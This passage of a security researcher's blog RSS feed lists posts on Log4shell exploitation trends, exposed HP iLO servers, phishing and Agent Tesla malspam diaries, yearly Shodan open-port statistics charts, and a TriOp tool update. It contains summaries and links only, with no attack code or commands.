        <content:encoded>&lt;p&gt;Few weeks ago, I attended the &lt;a href=&#34;https://www.first.org/events/symposium/regional_europe2022/&#34;&gt;2022 TF-CSIRT Meeting &amp;amp; FIRST Regional Symposium Europe&lt;/a&gt; and gave a lighting talk there discussing couple of interesting trends seen in Log4shell exploitation attempts and the possibility to create a simple generic defense agains similar attacks in the future. Recordings of all the talks are now available on &lt;a href=&#34;https://www.youtube.com/watch?v=DWYJ3gBqQAk&amp;amp;list=PLBAUUhONOrO8eOqT32j7cNuQiwhRG9FyF&amp;amp;index=1&#34;&gt;YouTube&lt;/a&gt; and you may find my lightning talk in the video under this paragraph or on &lt;a href=&#34;https://www.youtube.com/watch?v=iG1ld1SNnsY&amp;amp;list=PLBAUUhONOrO8eOqT32j7cNuQiwhRG9FyF&amp;amp;index=10&amp;amp;t=1251s&#34;&gt;this link&lt;/a&gt;. Lightning talks were supposed to be only 5 minutes long and I went significantly over the allocated time, but I hope that most attendees didn&amp;rsquo;t mind it too much&amp;hellip;&lt;/p&gt;
&lt;p align=&#34;center&#34;&gt;&lt;iframe width=&#34;560&#34; height=&#34;315&#34; src=&#34;https://www.youtube.com/embed/iG1ld1SNnsY?start=1251&#34; title=&#34;YouTube video player&#34; frameborder=&#34;0&#34; allow=&#34;accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture&#34; allowfullscreen&gt;&lt;/iframe&gt;&lt;/p&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.net/images/icons/microphone.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>FIRST</category>
            
          
            
              <category>TF-CSIRT</category>
            
          
            
              <category>Log4shell</category>
            
          
            
              <category>Vulnerability</category>
            
          
            
              <category>Exploit</category>
            
          
        
        
          
            
              <category>Talks</category>
            
          
            
              <category>2022</category>
            
          
        
        
      </item>
      
      <item>
        <title>SANS ISC Diary - Over 20 thousand servers have their iLO interfaces exposed to the internet, many with outdated and vulnerable versions of FW</title>
        <link>https://untrustednetwork.net/en/2022/01/26/exposed_hp_ilo/</link>
        <pubDate>Wed, 26 Jan 2022 12:20:00 +0100</pubDate>
        
        <atom:modified>Wed, 26 Jan 2022 12:20:00 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2022/01/26/exposed_hp_ilo/</guid>
        <description>A new Diary of mine was published today on the SANS Internet Storm Center website. In this one, we&amp;rsquo;ll take a look at the high number of HP servers that have their out-of-band configuration interface exposed to the internet&amp;hellip;</description>
        <content:encoded>&lt;p&gt;A new &lt;a href=&#34;https://isc.sans.edu/diary/28276&#34;&gt;Diary&lt;/a&gt; of mine was published today on the &lt;a href=&#34;https://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt; website. In this one, we&amp;rsquo;ll take a look at the high number of HP servers that have their out-of-band configuration interface exposed to the internet&amp;hellip;&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/isc/isc-diary.jpg&#34; alt=&#34;ISC diary&#34;&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/isc.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SANS</category>
            
          
            
              <category>HP</category>
            
          
            
              <category>Vulnerability</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2022</category>
            
          
        
        
          
            
              <category>SANS ISC Diary</category>
            
          
        
      </item>
      
      <item>
        <title>SANS ISC Diary - Phishing e-mail with...an advertisement?</title>
        <link>https://untrustednetwork.net/en/2022/01/18/phishing_with_advertisement/</link>
        <pubDate>Tue, 18 Jan 2022 10:10:00 +0100</pubDate>
        
        <atom:modified>Tue, 18 Jan 2022 10:10:00 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2022/01/18/phishing_with_advertisement/</guid>
        <description>A new Diary of mine was published today on the SANS Internet Storm Center website. In this one, we&amp;rsquo;ll take a look at a slightly unusual phishing message that contained text reminiscent of an advertisement for Xerox products&amp;hellip;</description>
        <content:encoded>&lt;p&gt;A new &lt;a href=&#34;https://isc.sans.edu/diary/28250&#34;&gt;Diary&lt;/a&gt; of mine was published today on the &lt;a href=&#34;https://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt; website. In this one, we&amp;rsquo;ll take a look at a slightly unusual phishing message that contained text reminiscent of an advertisement for Xerox products&amp;hellip;&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/isc/isc-diary.jpg&#34; alt=&#34;ISC diary&#34;&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/isc.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SANS</category>
            
          
            
              <category>Phishing</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2022</category>
            
          
        
        
          
            
              <category>SANS ISC Diary</category>
            
          
        
      </item>
      
      <item>
        <title>Podcast with Gaper.io about (not just) work from home security</title>
        <link>https://untrustednetwork.net/en/2022/01/14/podcast-with-gaper.io-about-not-just-work-from-home-security/</link>
        <pubDate>Fri, 14 Jan 2022 14:00:00 +0100</pubDate>
        
        <atom:modified>Fri, 14 Jan 2022 14:00:00 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2022/01/14/podcast-with-gaper.io-about-not-just-work-from-home-security/</guid>
        <description>I&amp;rsquo;ve been invited to do a podcast with Gaper.io some time back, and the resulting recording was published today. Mark Allen, Gaper&amp;rsquo;s business development director, and I spent nearly 20 minutes talking about different security aspects of work from home, general security awareness and several other topics. If you&amp;rsquo;re looking for a light, security-related podcast listen to, this one might not be a bad choice&amp;hellip;</description>
        <content:encoded>&lt;p&gt;I&amp;rsquo;ve been invited to do a podcast with &lt;a href=&#34;https://gaper.io/&#34;&gt;Gaper.io&lt;/a&gt; some time back, and the resulting recording was &lt;a href=&#34;https://gaper.io/user/jan_kopriva/&#34;&gt;published today&lt;/a&gt;. Mark Allen, Gaper&amp;rsquo;s business development director, and I spent nearly 20 minutes talking about different security aspects of work from home, general security awareness and several other topics. If you&amp;rsquo;re looking for a light, security-related podcast listen to, this one might not be a bad choice&amp;hellip;&lt;/p&gt;
&lt;p&gt;&lt;iframe title=&#34;Jan Kopriva, Security Specialist with Alef protects the rest of us from the bad guys&#34; style=&#34;border: none;&#34; scrolling=&#34;no&#34; data-name=&#34;pb-iframe-player&#34; src=&#34;https://www.podbean.com/player-v2/?from=embed&amp;i=2t7b7-114788a-pb&amp;square=1&amp;share=1&amp;download=1&amp;skin=f6f6f6&amp;btn-skin=60a0c8&amp;size=300%22%20allowfullscreen=&#34; allowfullscreen=&#34;&#34; width=&#34;100%&#34; height=&#34;400&#34;&gt;&lt;/iframe&gt;&lt;/p&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/icons/microphone.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>Podcast</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2022</category>
            
          
        
        
      </item>
      
      <item>
        <title>Open ports statistics for 2021</title>
        <link>https://untrustednetwork.net/en/2022/01/05/open_ports_2022/</link>
        <pubDate>Wed, 05 Jan 2022 07:30:00 +0200</pubDate>
        
        <atom:modified>Wed, 05 Jan 2022 07:30:00 +0200</atom:modified>
        <guid>https://untrustednetwork.net/en/2022/01/05/open_ports_2022/</guid>
        <description>The year 2021 is behind us which means that the time has come for us to take a look at how the internet changed over its 365 days.
As always, the data, on which the following charts are based, have been gathered using Shodan. Therefore bear in mind that although the charts should give us a good enough view of more significant changes, they may not be completely accurate (see the first post with quarterly statistics.</description>
        <content:encoded>&lt;p&gt;The year 2021 is behind us which means that the time has come for us to take a look at how the internet changed over its 365 days.&lt;/p&gt;
&lt;p&gt;As always, the data, on which the following charts are based, have been gathered using &lt;a href=&#34;https://www.shodan.io/&#34;&gt;Shodan&lt;/a&gt;. Therefore bear in mind that although the charts should give us a good enough view of more significant changes, they may not be completely accurate (see the &lt;a href=&#34;https://untrustednetwork.net/en/2020/09/30/open-ports-statistics-for-q3-2020/&#34;&gt;first post with quarterly statistics&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;It should be mentioned that since Shodan started offering a new service called &lt;a href=&#34;https://trends.shodan.io/&#34;&gt;Trends&lt;/a&gt; few months back, which enables one to quickly view similar charts as the ones bellow for arbitrary search queries, this may be the last post in the &amp;ldquo;Open port statistics&amp;rdquo; series, since these are somewhat superfluous given the new service&amp;hellip; Althoug, since Shodan Trends displays only &amp;ldquo;high-level&amp;rdquo; charts with significantly lower level of precission (it seems that it uses either an average or a median for each month, whereas the following charts show precise values returned by Shodan on each day in the year), maybe I&amp;rsquo;ll decide to keep posting these at least on a yearly basis - we&amp;rsquo;ll see&amp;hellip;&lt;/p&gt;
&lt;p&gt;Should you be interested in the port situation in the Czech Republic, you may find corresponding charts &lt;a href=&#34;https://untrustednetwork.net/cs/2022/01/05/open_ports_2022/&#34;&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Bellow, you may find charts for the following protocols and ports:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&#34;#ssh&#34;&gt;SSH (port 22)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#telnet&#34;&gt;Telnet (port 23)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#dns&#34;&gt;DNS (port 53)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#ntp&#34;&gt;NTP (port 123)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#snmp&#34;&gt;SNMP (port 161)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#smb&#34;&gt;SMB (port 445)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#rdp&#34;&gt;RDP (port 3389)&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h4 id=&#34;a-hrefwebweba&#34;&gt;&lt;a href=&#34;#web&#34;&gt;Web&lt;/a&gt;&lt;/h4&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&#34;#web&#34;&gt;HTTP (port 80)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#https&#34;&gt;HTTPS (port 443)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#htls13&#34;&gt;TLS 1.3 (port 443)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#htls12&#34;&gt;TLS 1.2 (port 443)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#htls11&#34;&gt;TLS 1.1 (port 443)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#htls10&#34;&gt;TLS 1.0 (port 443)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#hssl3&#34;&gt;SSL 3.0 (port 443)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#hssl2&#34;&gt;SSL 2.0 (port 443)&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h4 id=&#34;a-hrefemaile-maila&#34;&gt;&lt;a href=&#34;#email&#34;&gt;E-mail&lt;/a&gt;&lt;/h4&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&#34;#smtp&#34;&gt;SMTP (port 25)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#smtps&#34;&gt;SMTPS (port 465)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#imap&#34;&gt;IMAP (port 143)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#imaps&#34;&gt;IMAPS (port 993)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#pop3&#34;&gt;POP3 (port 110)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#pop3s&#34;&gt;POP3S (port 995)&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h4 id=&#34;a-hreftlsssltlsa&#34;&gt;&lt;a href=&#34;#tls&#34;&gt;SSL/TLS&lt;/a&gt;&lt;/h4&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&#34;#tls13&#34;&gt;TLS 1.3 (all ports)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#tls12&#34;&gt;TLS 1.2 (all ports)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#tls11&#34;&gt;TLS 1.1 (all ports)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#tls10&#34;&gt;TLS 1.0 (all ports)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#ssl3&#34;&gt;SSL 3.0 (all ports)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#ssl2&#34;&gt;SSL 2.0 (all ports)&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h4 id=&#34;a-hreficsindustrial-control-systems-icsa&#34;&gt;&lt;a href=&#34;#ics&#34;&gt;Industrial Control Systems (ICS)&lt;/a&gt;&lt;/h4&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&#34;#ics_all&#34;&gt;All ICS protocols&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#modbus&#34;&gt;Modbus (port 502)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#eibnet&#34;&gt;EIBnet/IP (port 3671)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&#34;#bacnet&#34;&gt;BACnet/IP (port 47808)&lt;br /&gt;
&lt;br&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;hr /&gt;
&lt;h4 id=&#34;ssh&#34;&gt;SSH (port 22)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q4/ssh.png&#34; alt=&#34;SSH&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;telnet&#34;&gt;Telnet (port 23)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q4/telnet.png&#34; alt=&#34;Telnet&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;dns&#34;&gt;DNS (port 53)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q4/dns.png&#34; alt=&#34;DNS&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;ntp&#34;&gt;NTP (port 123)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q4/ntp.png&#34; alt=&#34;NTP&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;snmp&#34;&gt;SNMP (port 161)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q4/snmp.png&#34; alt=&#34;SNMP&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;smb&#34;&gt;SMB (port 445)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q4/smb.png&#34; alt=&#34;SMB&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;rdp&#34;&gt;RDP (port 3389)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q4/rdp.png&#34; alt=&#34;RDP&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;br&gt;
&lt;h2 id=&#34;web&#34;&gt;Web&lt;/h2&gt;
&lt;h4 id=&#34;http&#34;&gt;HTTP (port 80)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q4/http.png&#34; alt=&#34;HTTP&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;https&#34;&gt;HTTPS (port 443)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q4/https.png&#34; alt=&#34;HTTPS&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;htls13&#34;&gt;TLS 1.3 (port 443)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q4/htls13.png&#34; alt=&#34;HTTPS/TLS 1.3&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;htls12&#34;&gt;TLS 1.2 (port 443)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q4/htls12.png&#34; alt=&#34;HTTPS/TLS 1.2&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;htls11&#34;&gt;TLS 1.1 (port 443)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q4/htls11.png&#34; alt=&#34;HTTPS/TLS 1.1&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;htls10&#34;&gt;TLS 1.0 (port 443)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q4/htls10.png&#34; alt=&#34;HTTPS/TLS 1.0&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;hssl3&#34;&gt;SSL 3.0 (port 443)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q4/hssl3.png&#34; alt=&#34;HTTPS/SSL 3.0&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;hssl2&#34;&gt;SSL 2.0 (port 443)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q4/hssl2.png&#34; alt=&#34;HTTPS/SSL 2.0&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;br&gt;
&lt;h2 id=&#34;email&#34;&gt;E-mail&lt;/h2&gt;
&lt;h4 id=&#34;smtp&#34;&gt;SMTP (port 25)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q4/smtp.png&#34; alt=&#34;SMTP&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;smtps&#34;&gt;SMTPS (port 465)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q4/smtps.png&#34; alt=&#34;SMTPS&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;imap&#34;&gt;IMAP (port 143)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q4/imap.png&#34; alt=&#34;IMAP&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;imaps&#34;&gt;IMAPS (port 993)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q4/imaps.png&#34; alt=&#34;IMAPS&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;pop3&#34;&gt;POP3 (port 110)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q4/pop3.png&#34; alt=&#34;POP3&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;pop3s&#34;&gt;POP3S (port 995)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q4/pop3s.png&#34; alt=&#34;POP3S&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;br&gt;
&lt;h2 id=&#34;tls&#34;&gt;SSL/TLS&lt;/h2&gt;
&lt;h4 id=&#34;tls13&#34;&gt;TLS 1.3 (all ports)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q4/tls13.png&#34; alt=&#34;HTTPS/TLS 1.3&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;tls12&#34;&gt;TLS 1.2 (all ports)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q4/tls12.png&#34; alt=&#34;HTTPS/TLS 1.2&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;tls11&#34;&gt;TLS 1.1 (all ports)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q4/tls11.png&#34; alt=&#34;HTTPS/TLS 1.1&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;tls10&#34;&gt;TLS 1.0 (all ports)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q4/tls10.png&#34; alt=&#34;HTTPS/TLS 1.0&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;ssl3&#34;&gt;SSL 3.0 (all ports)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q4/ssl3.png&#34; alt=&#34;HTTPS/SSL 3.0&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;ssl2&#34;&gt;SSL 2.0 (all ports)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q4/ssl2.png&#34; alt=&#34;HTTPS/SSL 2.0&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;br&gt;
&lt;h2 id=&#34;ics&#34;&gt;Industrial Control Systems&lt;/h2&gt;
&lt;h4 id=&#34;ics_all&#34;&gt;All ICS protocols&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q4/ics.png&#34; alt=&#34;All ICS protocols&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;modbus&#34;&gt;Modbus (port 502)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q4/modbus.png&#34; alt=&#34;Modbus&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;eibnet&#34;&gt;EIBnet/IP (port 3671)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q4/eibnet.png&#34; alt=&#34;EIBnet&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
&lt;h4 id=&#34;bacnet&#34;&gt;BACnet/IP (port 47808)&lt;/h4&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/ports/2021/q4/bacnet.png&#34; alt=&#34;BACnet&#34; style=&#34;max-width:800px;width:100%&#34;&gt;
</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/ports/2021/q4/ssl2.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SSL</category>
            
          
            
              <category>TLS</category>
            
          
            
              <category>Telnet</category>
            
          
            
              <category>DNS</category>
            
          
            
              <category>NTP</category>
            
          
            
              <category>SNMP</category>
            
          
            
              <category>SMB</category>
            
          
            
              <category>RDP</category>
            
          
            
              <category>HTTP</category>
            
          
            
              <category>HTTPS</category>
            
          
            
              <category>SMTP</category>
            
          
            
              <category>SMTPS</category>
            
          
            
              <category>IMAP</category>
            
          
            
              <category>IMAPS</category>
            
          
            
              <category>POP3</category>
            
          
            
              <category>POP3S</category>
            
          
            
              <category>ICS</category>
            
          
            
              <category>Modbus</category>
            
          
            
              <category>EIBnet</category>
            
          
            
              <category>BACnet</category>
            
          
            
              <category>Shodan</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2022</category>
            
          
        
        
          
            
              <category>Open port statistics</category>
            
          
        
      </item>
      
      <item>
        <title>SANS ISC Diary - Do you want your Agent Tesla in the 300 MB or 8 kB package?</title>
        <link>https://untrustednetwork.net/en/2021/12/31/agent_tesla-300mb/</link>
        <pubDate>Fri, 31 Dec 2021 13:15:00 +0100</pubDate>
        
        <atom:modified>Fri, 31 Dec 2021 13:15:00 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2021/12/31/agent_tesla-300mb/</guid>
        <description>A new Diary of mine was published today on the SANS Internet Storm Center website. In this one, we&amp;rsquo;ll take a look at some of the largest and smallest malicious PE files that were caught by my malspam trap in 2021&amp;hellip;</description>
        <content:encoded>&lt;p&gt;A new &lt;a href=&#34;https://isc.sans.edu/diary/28202&#34;&gt;Diary&lt;/a&gt; of mine was published today on the &lt;a href=&#34;https://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt; website. In this one, we&amp;rsquo;ll take a look at some of the largest and smallest malicious PE files that were caught by my malspam trap in 2021&amp;hellip;&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/isc/isc-diary.jpg&#34; alt=&#34;ISC diary&#34;&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/isc.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SANS</category>
            
          
            
              <category>Agent Tesla</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2021</category>
            
          
        
        
          
            
              <category>SANS ISC Diary</category>
            
          
        
      </item>
      
      <item>
        <title>SANS ISC Diary - PowerPoint attachments, Agent Tesla and code reuse in malware</title>
        <link>https://untrustednetwork.net/en/2021/12/20/agent_tesla-powerpoint/</link>
        <pubDate>Mon, 20 Dec 2021 17:00:00 +0100</pubDate>
        
        <atom:modified>Mon, 20 Dec 2021 17:00:00 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2021/12/20/agent_tesla-powerpoint/</guid>
        <description>A new Diary of mine was published today on the SANS Internet Storm Center website. In this one, we&amp;rsquo;ll take a look at a malspam message with macro-enabled PowerPoint attachment that turned out to be first stage of an Agent Tesla infection chain&amp;hellip;</description>
        <content:encoded>&lt;p&gt;A new &lt;a href=&#34;https://isc.sans.edu/diary/28154&#34;&gt;Diary&lt;/a&gt; of mine was published today on the &lt;a href=&#34;https://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt; website. In this one, we&amp;rsquo;ll take a look at a malspam message with macro-enabled PowerPoint attachment that turned out to be first stage of an Agent Tesla infection chain&amp;hellip;&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/isc/isc-diary.jpg&#34; alt=&#34;ISC diary&#34;&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/isc.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SANS</category>
            
          
            
              <category>Agent Tesla</category>
            
          
            
              <category>Macro</category>
            
          
            
              <category>Malspam</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2021</category>
            
          
        
        
          
            
              <category>SANS ISC Diary</category>
            
          
        
      </item>
      
      <item>
        <title>SANS ISC Diary - Phishing page hiding itself using dynamically adjusted IP-based allow list</title>
        <link>https://untrustednetwork.net/en/2021/11/24/phishing_allow_list/</link>
        <pubDate>Wed, 24 Nov 2021 12:10:00 +0100</pubDate>
        
        <atom:modified>Wed, 24 Nov 2021 12:10:00 +0100</atom:modified>
        <guid>https://untrustednetwork.net/en/2021/11/24/phishing_allow_list/</guid>
        <description>A new Diary of mine was published today on the SANS Internet Storm Center website. In this one, we&amp;rsquo;ll take a look at an interesting protection mechanism used on a phishing site to deny access to it to anyone but the victim who first clicked the link in a phishing mail&amp;hellip;</description>
        <content:encoded>&lt;p&gt;A new &lt;a href=&#34;https://isc.sans.edu/diary/28070&#34;&gt;Diary&lt;/a&gt; of mine was published today on the &lt;a href=&#34;https://isc.sans.edu/&#34;&gt;SANS Internet Storm Center&lt;/a&gt; website. In this one, we&amp;rsquo;ll take a look at an interesting protection mechanism used on a phishing site to deny access to it to anyone but the victim who first clicked the link in a phishing mail&amp;hellip;&lt;/p&gt;
&lt;img src=&#34;https://untrustednetwork.net/images/isc/isc-diary.jpg&#34; alt=&#34;ISC diary&#34;&gt;</content:encoded>
        <dc:creator>Jan Kopriva</dc:creator>
        <media:content url="https://untrustednetwork.netimages/isc.png" medium="image"><media:title type="html">featured image</media:title></media:content>
        
        
        
          
            
              <category>SANS</category>
            
          
            
              <category>Phishing</category>
            
          
        
        
          
            
              <category>News</category>
            
          
            
              <category>2021</category>
            
          
        
        
          
            
              <category>SANS ISC Diary</category>
            
          
        
      </item>
      
      <item>
        <title>TriOp update - version 1.4 (and Shodan Trends)</title>
        <link>https://untrustednetwork.net/en/2021/10/28/triop-update-version-1.4-and-shodan-trends/</link>
        <pubDate>Thu, 28 Oct 2021 14:00:00 +0200</pubDate>
        
        <atom:modified>Thu, 28 Oct 2021 14:00:00 +0200</atom:modified>
        <guid>https://untrustednetwork.net/en/2021/10/28/triop-update-version-1.4-and-shodan-trends/</guid>
        <description>I’ve published version 1.4 of TriOp today. The only change in this version is the addition of CVE-2021-31206 (vulnerability used in the ProxyShell attack) to the relevant search list.
One additional point that deserves a mention is that Shodan has recently opened access to a new service called Shodan Trends, which enables users to generate trend charts for (probably) arbitrary Shodan queries. Although these charts are based on monthly averages and are therefore not as precise as charts generated from data collected on a daily basis using TriOp, they can certainly provide one with an interesting look at long-term trends.</description>
        <content:encoded>&lt;p&gt;I’ve published version 1.4 of &lt;a href=&#34;https://untrustednetwork.net/en/triop/&#34;&gt;TriOp&lt;/a&gt; today. The only change in this version is the addition of CVE-2021-31206 (vulnerability used in the ProxyShell attack) to the relevant search list.&lt;/p&gt;
